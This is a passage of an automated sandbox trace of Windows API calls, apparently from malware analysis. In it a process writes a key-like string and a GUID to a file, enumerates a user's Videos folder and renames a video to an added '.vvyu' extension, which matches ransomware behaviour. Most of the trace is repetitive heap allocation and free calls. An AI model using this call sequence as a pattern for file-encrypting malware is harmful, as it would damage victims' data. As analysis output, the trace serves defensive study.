lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0192.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0192.188] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0192.189] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.189] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.189] CloseHandle (hObject=0x584) returned 1 [0192.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0192.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0192.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0192.192] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z X z-1ADfCAZUF.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z x z-1adfcazuf.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z X z-1ADfCAZUF.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z x z-1adfcazuf.mkv.vvyu")) returned 1 [0192.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.194] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0192.197] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361b25e0, ftCreationTime.dwHighDateTime=0x1d8a3d5, ftLastAccessTime.dwLowDateTime=0xf9918970, ftLastAccessTime.dwHighDateTime=0x1d8a6d1, ftLastWriteTime.dwLowDateTime=0xf9918970, ftLastWriteTime.dwHighDateTime=0x1d8a6d1, nFileSizeHigh=0x0, nFileSizeLow=0xed04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z X z-1ADfCAZUF.mkv", cAlternateFileName="ZXZ-1A~1.MKV")) returned 0 [0192.198] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0192.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0192.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0192.198] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0192.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1f90 | out: hHeap=0x2c0000) returned 1 [0192.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40630 | out: hHeap=0x2c0000) returned 1 [0192.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1f48 | out: hHeap=0x2c0000) returned 1 [0192.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1f00 | out: hHeap=0x2c0000) returned 1 [0192.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1eb8 | out: hHeap=0x2c0000) returned 1 [0192.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2218 | out: hHeap=0x2c0000) returned 1 [0192.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2260 | out: hHeap=0x2c0000) returned 1 [0192.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae22a8 | out: hHeap=0x2c0000) returned 1 [0192.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae22f0 | out: hHeap=0x2c0000) returned 1 [0192.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2338 | out: hHeap=0x2c0000) returned 1 [0192.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0192.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2380 | out: hHeap=0x2c0000) returned 1 [0192.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae23c8 | out: hHeap=0x2c0000) returned 1 [0192.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2410 | out: hHeap=0x2c0000) returned 1 [0192.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2458 | out: hHeap=0x2c0000) returned 1 [0192.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae24a0 | out: hHeap=0x2c0000) returned 1 [0192.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae24e8 | out: hHeap=0x2c0000) returned 1 [0192.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2530 | out: hHeap=0x2c0000) returned 1 [0192.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0192.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0192.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b40 | out: hHeap=0x2c0000) returned 1 [0192.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b88 | out: hHeap=0x2c0000) returned 1 [0192.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0192.203] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0192.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0192.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0192.212] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0192.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0192.212] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0192.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0192.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0192.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.235] RtlAllocateHeap 